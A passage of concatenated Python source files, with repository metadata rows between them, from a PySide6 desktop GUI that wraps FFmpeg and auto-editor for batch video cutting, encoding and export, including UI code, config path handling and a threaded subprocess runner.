u"\u5904\u7406\u89c6\u9891", None)) self.VautocutSTBtn.setText(QCoreApplication.translate("VautocutInterface", u"\u4e2d\u6b62\u5904\u7406", None)) self.VautocutpushBtn_2.setText(QCoreApplication.translate("VautocutInterface", u"\u89e3\u51bb", None)) self.Vautocutinputfile.setText(QCoreApplication.translate("VautocutInterface", u"\u6dfb\u52a0\u6587\u4ef6", None)) self.Vautocutinputclear.setText(QCoreApplication.translate("VautocutInterface", u"\u6e05\u9664", None)) self.Vautocutoutputfolder.setText(QCoreApplication.translate("VautocutInterface", u"\u9009\u62e9\u8f93\u51fa\u6587\u4ef6\u5939", None)) self.VautocutTitle2_3.setText(QCoreApplication.translate("VautocutInterface", u"\u7f16\u7801\u8bbe\u7f6e", None)) self.VautocutTitle2_2.setText(QCoreApplication.translate("VautocutInterface", u"\u81ea\u52a8\u526a\u8f91\u8bbe\u7f6e", None)) self.VautocutlineEditVE.setText(QCoreApplication.translate("VautocutInterface", u"default", None)) self.Vautocutlabel_4.setText(QCoreApplication.translate("VautocutInterface", u"\u97f3\u9891\u7f16\u7801\u53c2\u6570", None)) self.VautocutradioButton_3.setText(QCoreApplication.translate("VautocutInterface", u"\u5bfc\u51fashotcut", None)) self.VautocutradioButton.setText(QCoreApplication.translate("VautocutInterface", u"\u5bfc\u51fapremiere", None)) self.Vautocutlabel_2.setText(QCoreApplication.translate("VautocutInterface", u"\u89c6\u9891\u7f16\u7801\u53c2\u6570", None)) self.VautocutradioButton_4.setText(QCoreApplication.translate("VautocutInterface", u"\u5bfc\u51fa\u5207\u7247", None)) self.VautocutradioButton_2.setText(QCoreApplication.translate("VautocutInterface", u"\u5bfc\u51faresolve", None)) self.Vautocutlabel_3.setText(QCoreApplication.translate("VautocutInterface", u"\u97f3\u9891\u7f16\u7801\u5668", None)) self.VcodecpIFplainTextEdit.setPlainText("") self.VautocutTitle3_2.setText(QCoreApplication.translate("VautocutInterface", u"\u89c6\u9891\u7f16\u7801\u5668", None)) self.VautocutcomboBox_3.setItemText(0, QCoreApplication.translate("VautocutInterface", u"256k", None)) self.VautocutcomboBox_3.setItemText(1, QCoreApplication.translate("VautocutInterface", u"128k", None)) self.VautocutcomboBox_3.setItemText(2, QCoreApplication.translate("VautocutInterface", u"64k", None)) self.VautocutcomboBox_3.setItemText(3, QCoreApplication.translate("VautocutInterface", u"192k", None)) self.VautocutcomboBox_3.setItemText(4, QCoreApplication.translate("VautocutInterface", u"320k", None)) self.VautocutcomboBox_3.setItemText(5, QCoreApplication.translate("VautocutInterface", u"512k", None)) self.Vautocutlabel_5.setText(QCoreApplication.translate("VautocutInterface", u"\u81ea\u5b9a\u4e49\u7f16\u7801", None)) self.VautocutlineEditAE.setText(QCoreApplication.translate("VautocutInterface", u"default", None)) self.VautocutcheckBox.setText(QCoreApplication.translate("VautocutInterface", u"\u97f3\u9891\u6807\u51c6\u5316", None)) self.VautocutradioButton_5.setText(QCoreApplication.translate("VautocutInterface", u"\u5bfc\u51faWAV", None)) self.VautocutradioButton_11.setText(QCoreApplication.translate("VautocutInterface", u"\u5bfc\u51fa\u89c6\u9891", None)) self.VautocutcheckBox_2.setText(QCoreApplication.translate("VautocutInterface", u"\u5de5\u7a0b\u4e0d\u5220\u9664silent", None)) self.Vautocutlabel_9.setText(QCoreApplication.translate("VautocutInterface", u"\u7247\u5934\u65f6\u957f", None)) self.Vautocutlabel_7.setText(QCoreApplication.translate("VautocutInterface", u"\u81ea\u52a8\u526a\u8f91\u9608\u503c\u8bbe\u7f6e", None)) self.VautocutradioButton_6.setText(QCoreApplication.translate("VautocutInterface", u"\u97f3\u9891\u9608\u503c", None)) self.VautocutradioButton_7.setText(QCoreApplication.translate("VautocutInterface", u"\u89c6\u9891\u9608\u503c", None)) self.VautocutradioButton_8.setText(QCoreApplication.translate("VautocutInterface", u"\u97f3\u89c6\u9891\u9608\u503c", None)) self.VautocutradioButton_9.setText(QCoreApplication.translate("VautocutInterface", u"\u4e0d\u8fdb\u884c\u81ea\u52a8\u526a\u8f91", None)) self.VautocutradioButton_10.setText(QCoreApplication.translate("VautocutInterface", u"\u9ed8\u8ba4", None)) self.VautocutlineEdit_2.setText(QCoreApplication.translate("VautocutInterface", u"audio:threshold=0.04", None)) self.VautocutlineEdit_3.setText(QCoreApplication.translate("VautocutInterface", u"motion:threshold=0.02,blur=3", None)) self.VautocutlineEdit_4.setText(QCoreApplication.translate("VautocutInterface", u"(or audio:4% motion:2%,blur=3)", None)) self.Vautocutlabel_11.setText(QCoreApplication.translate("VautocutInterface", u"margin-after", None)) self.Vautocutlabel_8.setText(QCoreApplication.translate("VautocutInterface", u"margin-before", None)) self.Vautocutlabel_10.setText(QCoreApplication.translate("VautocutInterface", u"\u7247\u5c3e\u65f6\u957f", None)) self.Vautocutlabel_6.setText(QCoreApplication.translate("VautocutInterface", u"\u53d8\u901f\u500d\u7387", None)) # retranslateUi
31,143
Python
.py
457
59.201313
147
0.752676
wish2333/VideoExtractAndConcat
8
0
0
LGPL-2.1
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,444
config.py
wish2333_VideoExtractAndConcat/modules/config.py
import os import configparser from modules.logger_config import logger def init_ffpath(): configinit = configparser.ConfigParser() configinit.read('.\\modules\\config.ini', 'UTF-8') if configinit['PATHS']['ffmpeg_path'] == '': ffmpeg_path_relative = '.\\FFmpeg\\bin\\ffmpeg.exe' ffprobe_path_relative = '.\\FFmpeg\\bin\\ffprobe.exe' # ffplay_path_relative = '.\\FFmpeg\\bin\\ffplay.exe' # 转换为绝对路径 init_ffmpeg_path = os.path.abspath(ffmpeg_path_relative) init_ffprobe_path = os.path.abspath(ffprobe_path_relative) # init_ffplay_path = os.path.abspath(ffplay_path_relative) # 写入配置文件 configinit['PATHS']['ffmpeg_path'] = init_ffmpeg_path configinit['PATHS']['ffprobe_path'] = init_ffprobe_path # configinit['PATHS']['ffplay_path'] = init_ffplay_path with open('.\\modules\\config.ini', 'w', encoding='UTF-8') as configfile: configinit.write(configfile) logger.info('FFmpeg路径已初始化为:' + init_ffmpeg_path) else: logger.info('FFmpeg路径已读取为:' + configinit['PATHS']['ffmpeg_path']) def init_autopath(): configinit = configparser.ConfigParser() configinit.read('.\\modules\\config.ini', 'UTF-8') if configinit['PATHS']['auto_path'] == '': auto_path_relative = '.\\Scripts\\auto-editor.exe' # 转换为绝对路径 init_auto_path = os.path.abspath(auto_path_relative) # 写入配置文件 configinit['PATHS']['auto_path'] = init_auto_path with open('.\\modules\\config.ini', 'w', encoding='UTF-8') as configfile: configinit.write(configfile) logger.info('Auto-Editor路径已初始化为:' + init_auto_path) else: logger.info('Auto-Editor路径已读取为:' + configinit['PATHS']['auto_path']) class ffpath: config = configparser.ConfigParser() config.read('.\\modules\\config.ini', 'UTF-8') ffmpeg_path = config.get('PATHS', 'ffmpeg_path') ffprobe_path = config.get('PATHS', 'ffprobe_path') # ffplay_path = config.get('PATHS', 'ffplay_path') def reset(self): config = configparser.ConfigParser() config.read('.\\modules\\config.ini', 'UTF-8') self.ffmpeg_path = config.get('PATHS', 'ffmpeg_path') self.ffprobe_path = config.get('PATHS', 'ffprobe_path') # self.ffplay_path = config.get('PATHS', 'ffplay_path') logger.info('FFmpeg路径已重置为:' + self.ffmpeg_path) class autopath: config = configparser.ConfigParser() config.read('.\\modules\\config.ini', 'UTF-8') auto_path = config.get('PATHS', 'auto_path') def reset(self): config = configparser.ConfigParser() config.read('.\\modules\\config.ini', 'UTF-8') self.auto_path = config.get('PATHS', 'auto_path') def set_config(ffmpeg_path, ffprobe_path): config = configparser.ConfigParser() config.read('.\\modules\\config.ini', 'UTF-8') config['PATHS']['ffmpeg_path'] = ffmpeg_path config['PATHS']['ffprobe_path'] = ffprobe_path # config['PATHS']['ffplay_path'] = ffplay_path with open('.\\modules\\config.ini', 'w', encoding='UTF-8') as configfile: config.write(configfile) logger.info('FFmpeg路径已设置为:' + ffmpeg_path) def set_auto_path(auto_path): config = configparser.ConfigParser() config.read('.\\modules\\config.ini', 'UTF-8') config['PATHS']['auto_path'] = auto_path with open('.\\modules\\config.ini', 'w', encoding='UTF-8') as configfile: config.write(configfile) logger.info('Auto-Editor路径已设置为:' + auto_path)
3,690
Python
.py
74
40.864865
81
0.6461
wish2333/VideoExtractAndConcat
8
0
0
LGPL-2.1
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,445
VautocutInterface.py
wish2333_VideoExtractAndConcat/modules/VautocutInterface.py
import os from PySide6.QtCore import QThread, Qt, Signal, QObject from PySide6.QtWidgets import QWidget, QFileDialog, QListWidgetItem from qfluentwidgets import MessageBox from modules.config import autopath, ffpath from modules.autoEditorApi import AutoEditor from modules.Ui_VautocutInterface import Ui_VautocutInterface from modules.logger_config import logger # Inherited from QObject, the subclasses designed for executing background tasks. class Worker(QObject): started = Signal() finished = Signal() interrupted = Signal() callback = Signal() def __init__(self, auto_editor_path, cmd, callback=None): super().__init__() self.auto_editor_path = auto_editor_path self.cmd = cmd self._started_flag = False # self._interrupted_flag = False # The flag of the worker starting. self.callback = callback # The callback function. self.is_interrupted = False # Callback flag when a task is interrupted. def interrupted_callback(self): logger.info("The interrupt signal is received. Worker interrupted.") self.is_interrupted = True # Set the flag of the worker interrupted. if callable(self.callback): self.callback() # Call the callback function. self.interrupted.emit() # Emit the signal of the worker interrupted. def run_video(self): self._started_flag = True # Set the flag of the worker starting. self.started.emit() # Emit the signal of the worker starting. self.auto_editor_instance = AutoEditor(self.auto_editor_path, interrupt_flag=self._interrupted_flag, callback=self.interrupted_callback) # Create an instance of the AutoEditor class. self.auto_editor_instance.run(self.cmd) # Run the editor with the given command. self.finished.emit() # Emit the signal of the worker finished. def interrupt(self): self._interrupted_flag = True # Set the flag of the worker starting. self.auto_editor_instance.update_interrupt_flag(self._interrupted_flag) # Update the interrupt flag of the AutoEditor instance. logger.info("The interrupt signal is sent. Worker is interrupted.") class WorkerThread(QThread): def __init__(self, worker): super().__init__() self.worker = worker self.worker.interrupted.connect(self.handle_interrupted) # When the worker is interrupted, call the handle_interrupted function. def run(self): try: self.worker.run_video() except Exception as e: logger.error(f"An error occurred while running the worker: {e}") def handle_interrupted(self): self.quit() # Quit the thread. class VautocutInterface(QWidget, Ui_VautocutInterface): def __init__(self, parent=None): super().__init__(parent=parent) self.setupUi(self) self.init_variables() self.init_action() self.init_print() self.bind() def init_variables(self): # file self.input_file_args = [] # circle self.i = 0 self.is_paused = False # filter[margin, edit, cut, speed, anormalize , vcodec, acodec, export] self.filter = ['', '', '', '', '', '', '',''] def init_action(self): # addItems vcodec_list = ['default', 'libx264', 'libx265', 'h264_nvenc', 'h264_qsv', 'h264_amf', 'hevc_nvenc', 'hevc_qsv', 'hevc_amf'] self.VautocutlineEditVE.addItems(vcodec_list) vsize_list = ['-b:v 10M', '-b:v 500k', '-q:v 0'] self.VautocutlineEdit.addItems(vsize_list) acodec_list = ['default', 'aac', 'alac', 'libfdk_aac', 'ac3', 'flac', 'libmp3lame', 'libopus', 'libvorbis', 'libwavpack'] self.VautocutlineEditAE.addItems(acodec_list) # radioButton self.VautocutradioButton_11.setChecked(True) self.VautocutradioButton_10.setChecked(True) def init_print(self): logger.debug("VautocutInterface initialized.") # Log the initialization of the VautocutInterface. def bind(self): # file operation self.Vautocutinputfile.clicked.connect(self.open_file) self.Vautocutinputclear.clicked.connect(self.clear_input_file) # change filter self.VautocutlineEditVE.currentTextChanged.connect(self.change_vcodec) self.VautocutlineEdit.currentTextChanged.connect(self.change_vcodec) self.VautocutlineEditAE.currentTextChanged.connect(self.change_acodec) self.VautocutcomboBox_3.currentTextChanged.connect(self.change_acodec) self.VautocutcheckBox.checkStateChanged.connect(self.change_anormalize) self.VautocutdoubleSpinBox.valueChanged.connect(self.change_margin) self.VautocutdoubleSpinBox_4.valueChanged.connect(self.change_margin) self.VautocutdoubleSpinBox_2.valueChanged.connect(self.change_cut) self.VautocutdoubleSpinBox_3.valueChanged.connect(self.change_cut) self.VautocutdoubleSpinBox_5.valueChanged.connect(self.change_speed) self.VautocutradioButton_6.toggled.connect(self.change_edit) self.VautocutradioButton_7.toggled.connect(self.change_edit) self.VautocutradioButton_8.toggled.connect(self.change_edit) self.VautocutradioButton_9.toggled.connect(self.change_edit) self.VautocutradioButton_10.toggled.connect(self.change_edit) self.VautocutlineEdit_2.textChanged.connect(self.change_edit) self.VautocutlineEdit_3.textChanged.connect(self.change_edit) self.VautocutlineEdit_4.textChanged.connect(self.change_edit) self.VautocutradioButton.toggled.connect(self.change_export) self.VautocutradioButton_2.toggled.connect(self.change_export) self.VautocutradioButton_3.toggled.connect(self.change_export) self.VautocutradioButton_4.toggled.connect(self.change_export) self.VautocutradioButton_5.toggled.connect(self.change_export) self.VautocutcheckBox_2.checkStateChanged.connect(self.change_export) # start self.VautocutpushBtn.clicked.connect(self.run_auto_editor) self.VautocutSTBtn.clicked.connect(self.interrupt_auto_editor) self.VautocutpushBtn_2.clicked.connect(self.unfreeze_config) def open_file(self): self.append_input_file_args, _ = QFileDialog.getOpenFileNames(self, "选择输入文件", "", "All Files (*)") for file in self.append_input_file_args: if file not in self.input_file_args: self.input_file_args.append(file) item = QListWidgetItem(file) self.Vautocutinputlist.addItem(item) def clear_input_file(self): self.input_file_args = [] self.Vautocutinputlist.clear() def change_filter(self): filter_str = ''.join(self.filter) self.VcodecpIFplainTextEdit.setPlainText(filter_str) def change_margin(self): a = self.VautocutdoubleSpinBox.text() b = self.VautocutdoubleSpinBox_4.text() if a != '0.00' and b != '0.00': self.filter[0] = f'--margin {a}s,{b}sec' elif a != '0.00' and b == '0.00': self.filter[0] = f'--margin {a}sec' elif a == '0.00' and b != '0.00': self.filter[0] = f'--margin {b}sec' else: self.filter[0] = '' self.change_filter() def change_edit(self): if self.VautocutradioButton_6.isChecked(): self.filter[1] = f' --edit "{self.VautocutlineEdit_2.text()}"' elif self.VautocutradioButton_7.isChecked(): self.filter[1] = f' --edit "{self.VautocutlineEdit_3.text()}"' elif self.VautocutradioButton_8.isChecked(): self.filter[1] = f' --edit "{self.VautocutlineEdit_4.text()}"' elif self.VautocutradioButton_9.isChecked(): self.filter[1] = ' --edit none' else: self.filter[1] = '' self.change_filter() def change_cut(self): a = self.VautocutdoubleSpinBox_2.text() b = self.VautocutdoubleSpinBox_3.text() if a != '0.00' and b != '0.00': self.filter[2] = f' --cut-out 0,{a}sec -{b}sec,end' elif a != '0.00' and b == '0.00': self.filter[2] = f' --cut-out 0,{a}sec' elif a == '0.00' and b != '0.00': self.filter[2] = f' --cut-out -{b}sec,end' else: self.filter[2] = '' self.change_filter() def change_speed(self): speed = self.VautocutdoubleSpinBox_5.text() if speed != '1.00': self.filter[3] = f' -v {speed}' else: self.filter[3] = '' self.change_filter() def change_anormalize(self): if self.filter[7] in ['', ' --export audio', ' --export clip-sequence'] and self.VautocutcheckBox.isChecked(): self.filter[4] = ' --audio-normalize ebu:i=-5,lra=5,gain=5,tp=-0.3' else: self.filter[4] = '' self.change_filter() def change_vcodec(self): vcodec = self.VautocutlineEditVE.currentText() vsize = self.VautocutlineEdit.currentText() if self.filter[7] in ['', ' --export clip-sequence'] and vcodec != 'default': self.filter[5] = f' -c:v {vcodec} {vsize}' else: self.filter[5] = '' self.change_filter() def change_acodec(self): acodec = self.VautocutlineEditAE.currentText() asize = self.VautocutcomboBox_3.currentText() if self.filter[7] in ['', ' --export clip-sequence'] and acodec != 'default': self.filter[6] = f' -c:a {acodec} -b:a {asize}' else: self.filter[6] = '' self.change_filter() def change_export(self): if not self.VautocutcheckBox_2.isChecked(): if self.VautocutradioButton_5.isChecked(): self.filter[7] = ' --export audio' elif self.VautocutradioButton.isChecked(): self.filter[7] = ' --export premiere' elif self.VautocutradioButton_2.isChecked(): self.filter[7] = ' --export resolve' elif self.VautocutradioButton_3.isChecked(): self.filter[7] = ' --export shotcut' elif self.VautocutradioButton_4.isChecked(): self.filter[7] = ' --export clip-sequence' else: self.filter[7] = '' else: if self.VautocutradioButton_5.isChecked(): self.filter[7] = ' --export audio' elif self.VautocutradioButton.isChecked(): self.filter[7] = ' --silent-speed 1 --video-speed 1 --export premiere' elif self.VautocutradioButton_2.isChecked(): self.filter[7] = ' --silent-speed 1 --video-speed 1 --export resolve' elif self.VautocutradioButton_3.isChecked(): self.filter[7] = ' --silent-speed 1 --video-speed 1 --export shotcut' elif self.VautocutradioButton_4.isChecked(): self.filter[7] = ' --export clip-sequence' else: self.filter[7] = '' self.change_vcodec() self.change_acodec() self.change_anormalize() self.change_filter() def run_auto_editor(self): if self.input_file_args != []: while self.i < len(self.input_file_args): if self.is_paused: break input_file = self.input_file_args[self.i] if os.path.isfile(input_file): command = [] command.append(f'"{input_file}"') command.append(self.VcodecpIFplainTextEdit.toPlainText()) command.append(f'--ffmpeg-location "{ffpath.ffmpeg_path}" --no-open') try: self.freeze_config() self.worker = Worker(autopath.auto_path, command) self.thread = WorkerThread(self.worker) self.thread.started.connect(self.on_thread_started()) self.thread.finished.connect(self.worker.deleteLater) self.thread.finished.connect(self.thread.deleteLater) self.thread.finished.connect(self.filter_thread_finished) self.thread.start() except Exception as e: logger.error(f"An error occurred while running the worker: {e}") else: m = MessageBox("错误", "输入文件不存在!", parent=self) if not m.exec(): self.unfreeze_config() self.i = 2666666666 self.filter_thread_finished() break def on_thread_started(self): self.is_paused = True # 开启暂停标志 logger.info(f'线程创建,暂停循环,i={self.i}') def filter_thread_finished(self): self.is_paused = False # 重置暂停标志 self.i = self.i + 1 # 开启下一个文件 if self.i < len(self.input_file_args): # 还有文件未处理 logger.info(f'{self.i-1}线程结束,开始循环,i={self.i}') self.run_auto_editor() # 开启下一个线程 else: self.i = 0 # 循环计数器清零 self.unfreeze_config() MessageBox("提示", "转码任务已完成!", parent=self).exec() def freeze_config(self): self.Vautocutinputfile.setEnabled(False) self.Vautocutinputclear.setEnabled(False) self.VautocutlineEditVE.setEnabled(False) self.VautocutlineEdit.setEnabled(False) self.VautocutlineEditAE.setEnabled(False) self.VautocutcomboBox_3.setEnabled(False) self.VautocutcheckBox.setEnabled(False) self.VautocutdoubleSpinBox.setEnabled(False) self.VautocutdoubleSpinBox_4.setEnabled(False) self.VautocutdoubleSpinBox_2.setEnabled(False) self.VautocutdoubleSpinBox_3.setEnabled(False) self.VautocutdoubleSpinBox_5.setEnabled(False) self.VautocutradioButton.setEnabled(False) self.VautocutradioButton_2.setEnabled(False) self.VautocutradioButton_3.setEnabled(False) self.VautocutradioButton_4.setEnabled(False) self.VautocutradioButton_5.setEnabled(False) self.VautocutradioButton_6.setEnabled(False) self.VautocutradioButton_7.setEnabled(False) self.VautocutradioButton_8.setEnabled(False) self.VautocutradioButton_9.setEnabled(False) self.VautocutradioButton_10.setEnabled(False) self.VautocutradioButton_11.setEnabled(False) self.VautocutlineEdit_2.setEnabled(False) self.VautocutlineEdit_3.setEnabled(False) self.VautocutlineEdit_4.setEnabled(False) self.VautocutcheckBox_2.setEnabled(False) self.VautocutpushBtn.setEnabled(False) self.VautocutSTBtn.setEnabled(False) self.VcodecpIFplainTextEdit.setEnabled(False) def unfreeze_config(self): self.Vautocutinputfile.setEnabled(True) self.Vautocutinputclear.setEnabled(True) self.VautocutlineEditVE.setEnabled(True) self.VautocutlineEdit.setEnabled(True) self.VautocutlineEditAE.setEnabled(True) self.VautocutcomboBox_3.setEnabled(True) self.VautocutcheckBox.setEnabled(True) self.VautocutdoubleSpinBox.setEnabled(True) self.VautocutdoubleSpinBox_4.setEnabled(True) self.VautocutdoubleSpinBox_2.setEnabled(True) self.VautocutdoubleSpinBox_3.setEnabled(True) self.VautocutdoubleSpinBox_5.setEnabled(True) self.VautocutradioButton.setEnabled(True) self.VautocutradioButton_2.setEnabled(True) self.VautocutradioButton_3.setEnabled(True) self.VautocutradioButton_4.setEnabled(True) self.VautocutradioButton_5.setEnabled(True) self.VautocutradioButton_6.setEnabled(True) self.VautocutradioButton_7.setEnabled(True) self.VautocutradioButton_8.setEnabled(True) self.VautocutradioButton_9.setEnabled(True) self.VautocutradioButton_10.setEnabled(True) self.VautocutradioButton_11.setEnabled(True) self.VautocutlineEdit_2.setEnabled(True) self.VautocutlineEdit_3.setEnabled(True) self.VautocutlineEdit_4.setEnabled(True) self.VautocutcheckBox_2.setEnabled(True) self.VautocutpushBtn.setEnabled(True) self.VautocutSTBtn.setEnabled(True) self.VcodecpIFplainTextEdit.setEnabled(True) def interrupt_auto_editor(self): if self.worker._started_flag: self.is_paused = True # 开启暂停标志 logger.info(f'暂停循环,i={self.i}') self.i = 2600000000 # 设定一个很大的数值,使线程结束 self.worker.interrupt() # 停止worker if self.worker.is_interrupted: # 停止worker self.thread.wait() # 等待线程结束 self.worker.deleteLater() # 删除worker对象 self.thread.deleteLater() # 删除线程对象 self._started_flag = False self.is_paused = False # 重置暂停标志 self.i = 0 # 循环计数器清零 self.unfreeze_config() MessageBox("警告", "转码任务已暂停!", parent=self).exec()
17,431
Python
.py
340
39.691176
191
0.639431
wish2333/VideoExtractAndConcat
8
0
0
LGPL-2.1
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,446
autoEditorApi.py
wish2333_VideoExtractAndConcat/modules/autoEditorApi.py
# autoEditorApi.py # 实现了FFmpeg的命令行接口,可以对视频进行各种操作,如截取、合并、转码、截图等。 import subprocess import os from modules.logger_config import logger import time import threading from modules.config import autopath import configparser class AutoEditor: # 初始化函数,用于初始化实例的ffmpeg_path属性 def __init__( self, auto_editor_path=autopath.auto_path, interrupt_flag=False, # 中断标志 callback=None, # 回调函数 ): self.auto_editor_path = auto_editor_path self.interrupt_flag = interrupt_flag self.callback = callback def update_interrupt_flag(self, flag=True): self.interrupt_flag = flag def check_interrupt_flag(self): while not self.interrupt_flag: # logger.info("auto-editor-Api守卫线程运行中") time.sleep(1) logger.debug("auto-editor-Api检测到中断请求") self.interrupt_run() def interrupt_run(self): if self.interrupt_flag: # 如果收到中断信号,则终止FFmpeg进程 logger.debug("尝试终止AutoEditor进程") self.p.terminate() self.p.wait(timeout=5) if self.p.poll() is None: self.p.kill() if callable(self.callback): self.callback() self.interrupt_flag = False logger.debug("AutoEditor进程强制终止") logger.debug("auto-editor-Api中断请求已处理") # 定义run方法来执行FFmpeg命令 def run(self, cmd): t = None # 守卫线程预留在try之外 try: cmd = [self.auto_editor_path] + cmd cmd_str = ' '.join(cmd) logger.info(f"尝试执行:{cmd_str}") # 创建线程运行FFmpeg命令 self.p = subprocess.Popen(cmd_str, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, encoding='utf-8', text=True) # 创建线程检测中断信号 t = threading.Thread(target=self.check_interrupt_flag) t.daemon = True t.start() if t.is_alive(): logger.debug('启动守卫线程成功') else: logger.error('启动守卫线程失败') # 实时输出FFmpeg命令的执行信息 while True: line = self.p.stdout.readline() if not line: # 如果没有更多输出,检查进程是否已经结束 if self.p.poll() is not None: break else: continue logger.debug(line.strip()) # 打印输出信息 print(line.strip(), end='\r') # 打印输出信息 # 如果出错,获取错误信息 out, err = self.p.communicate() if self.p.returncode != 0: logger.error(f"命令执行失败,错误信息:{err}") raise Exception(err) except FileNotFoundError as fnf_error: logger.error( f"找不到auto-editor命令,请检查auto_editor_path是否正确配置。") raise fnf_error except PermissionError as p_error: logger.error( f"auto-editor命令没有执行权限,请检查auto_editor_path是否正确配置。") raise p_error except Exception as e: logger.error(f"执行AutoEditor命令失败:{e}") raise e finally: logger.info("AutoEditor命令执行完成") if t and t.is_alive(): self.interrupt_flag = True # 设置中断标志 t.join() self.interrupt_flag = False # 重置中断标志 logger.debug("守卫线程退出")
4,069
Python
.py
96
23.458333
66
0.529325
wish2333/VideoExtractAndConcat
8
0
0
LGPL-2.1
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,447
about_Interface.py
wish2333_VideoExtractAndConcat/modules/about_Interface.py
from PySide6.QtCore import QUrl from PySide6.QtGui import QDesktopServices from PySide6.QtWidgets import QWidget, QFileDialog, QMessageBox, QListWidgetItem from qfluentwidgets import FluentIcon from modules.config import ffpath, set_config from modules.Ui_aboutInterface import Ui_AboutInterface class AboutInterface(QWidget, Ui_AboutInterface): def __init__(self, parent=None): super().__init__(parent=parent) self.setupUi(self) self.init_icons() self.bind() # 必须给子界面设置全局唯一的对象名 def init_icons(self): self.AboutIFinputfile.setIcon(FluentIcon.GITHUB) # self.AboutIFinputclear.setIcon(FluentIcon.) # self.AboutIFoutputfolder.setIcon(FluentIcon.) # Bind Event def bind(self): # Bind Button Event self.AboutIFinputfile.clicked.connect(self.open_github) self.AboutIFinputclear.clicked.connect(self.open_bilibili) self.AboutIFoutputfolder.clicked.connect(self.open_blog) # Check Event # LineEdit/ComboBox/SpinBox Event # self.VcodecpIFdoubleSpinBox.valueChanged.connect(self.change_accelerated) def open_github(self): QDesktopServices.openUrl(QUrl("https://github.com/wish2333/VideoExtractAndConcat")) def open_bilibili(self): QDesktopServices.openUrl(QUrl("https://space.bilibili.com/18775396")) def open_blog(self): QDesktopServices.openUrl(QUrl("https://wish2333.github.io/zh/"))
1,511
Python
.py
32
38.90625
91
0.736062
wish2333/VideoExtractAndConcat
8
0
0
LGPL-2.1
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,448
Ui_vcodecpInterface.py
wish2333_VideoExtractAndConcat/modules/Ui_vcodecpInterface.py
# -*- coding: utf-8 -*- ################################################################################ ## Form generated from reading UI file 'vcodecpInterface.ui' ## ## Created by: Qt User Interface Compiler version 6.7.0 ## ## WARNING! All changes made in this file will be lost when recompiling UI file! ################################################################################ from PySide6.QtCore import (QCoreApplication, QDate, QDateTime, QLocale, QMetaObject, QObject, QPoint, QRect, QSize, QTime, QUrl, Qt) from PySide6.QtGui import (QBrush, QColor, QConicalGradient, QCursor, QFont, QFontDatabase, QGradient, QIcon, QImage, QKeySequence, QLinearGradient, QPainter, QPalette, QPixmap, QRadialGradient, QTransform) from PySide6.QtWidgets import (QAbstractScrollArea, QApplication, QFrame, QGridLayout, QHBoxLayout, QLabel, QLayout, QLineEdit, QListWidgetItem, QPlainTextEdit, QPushButton, QSizePolicy, QSpacerItem, QVBoxLayout, QWidget) from qfluentwidgets import (CheckBox, ComboBox, DoubleSpinBox, EditableComboBox, ListWidget, PlainTextEdit, PrimaryPushButton, PushButton, RadioButton, ScrollArea, SpinBox, TimeEdit) class Ui_VcodecpInterface(object): def setupUi(self, VcodecpInterface): if not VcodecpInterface.objectName(): VcodecpInterface.setObjectName(u"VcodecpInterface") VcodecpInterface.resize(1085, 749) VcodecpInterface.setMinimumSize(QSize(780, 0)) self.verticalLayout = QVBoxLayout(VcodecpInterface) self.verticalLayout.setObjectName(u"verticalLayout") self.VcodecpIFscrollArea = ScrollArea(VcodecpInterface) self.VcodecpIFscrollArea.setObjectName(u"VcodecpIFscrollArea") self.VcodecpIFscrollArea.setMinimumSize(QSize(760, 0)) self.VcodecpIFscrollArea.setFrameShape(QFrame.Shape.NoFrame) self.VcodecpIFscrollArea.setFrameShadow(QFrame.Shadow.Sunken) self.VcodecpIFscrollArea.setWidgetResizable(True) self.VcodecpIFfacescrollAreaWidgetContents = QWidget() self.VcodecpIFfacescrollAreaWidgetContents.setObjectName(u"VcodecpIFfacescrollAreaWidgetContents") self.VcodecpIFfacescrollAreaWidgetContents.setGeometry(QRect(0, 0, 1050, 844)) self.verticalLayout_3 = QVBoxLayout(self.VcodecpIFfacescrollAreaWidgetContents) self.verticalLayout_3.setObjectName(u"verticalLayout_3") self.VcodecpIFbox01 = QHBoxLayout() self.VcodecpIFbox01.setSpacing(20) self.VcodecpIFbox01.setObjectName(u"VcodecpIFbox01") self.VcodecpIFbox01.setSizeConstraint(QLayout.SizeConstraint.SetDefaultConstraint) self.VcodecpIFverticalLayout_4 = QVBoxLayout() self.VcodecpIFverticalLayout_4.setObjectName(u"VcodecpIFverticalLayout_4") self.VcodecpIFverticalLayout_4.setContentsMargins(-1, -1, 0, -1) self.VcodecpIFTitle1 = QLabel(self.VcodecpIFfacescrollAreaWidgetContents) self.VcodecpIFTitle1.setObjectName(u"VcodecpIFTitle1") sizePolicy = QSizePolicy(QSizePolicy.Policy.Maximum, QSizePolicy.Policy.Maximum) sizePolicy.setHorizontalStretch(0) sizePolicy.setVerticalStretch(0) sizePolicy.setHeightForWidth(self.VcodecpIFTitle1.sizePolicy().hasHeightForWidth()) self.VcodecpIFTitle1.setSizePolicy(sizePolicy) self.VcodecpIFTitle1.setMaximumSize(QSize(120, 64)) font = QFont() font.setPointSize(28) font.setBold(True) font.setKerning(True) self.VcodecpIFTitle1.setFont(font) self.VcodecpIFverticalLayout_4.addWidget(self.VcodecpIFTitle1) self.VcodecpIFTitle2 = QLabel(self.VcodecpIFfacescrollAreaWidgetContents) self.VcodecpIFTitle2.setObjectName(u"VcodecpIFTitle2") sizePolicy1 = QSizePolicy(QSizePolicy.Policy.Preferred, QSizePolicy.Policy.Maximum) sizePolicy1.setHorizontalStretch(0) sizePolicy1.setVerticalStretch(0) sizePolicy1.setHeightForWidth(self.VcodecpIFTitle2.sizePolicy().hasHeightForWidth()) self.VcodecpIFTitle2.setSizePolicy(sizePolicy1) self.VcodecpIFTitle2.setMaximumSize(QSize(100, 45)) font1 = QFont() font1.setPointSize(18) font1.setBold(True) font1.setKerning(True) self.VcodecpIFTitle2.setFont(font1) self.VcodecpIFverticalLayout_4.addWidget(self.VcodecpIFTitle2) self.VcodecpIFbox01.addLayout(self.VcodecpIFverticalLayout_4) self.label = QLabel(self.VcodecpIFfacescrollAreaWidgetContents) self.label.setObjectName(u"label") self.label.setMaximumSize(QSize(16777215, 80)) self.VcodecpIFbox01.addWidget(self.label) self.VcodecpIFhorizontalSpacer = QSpacerItem(20, 20, 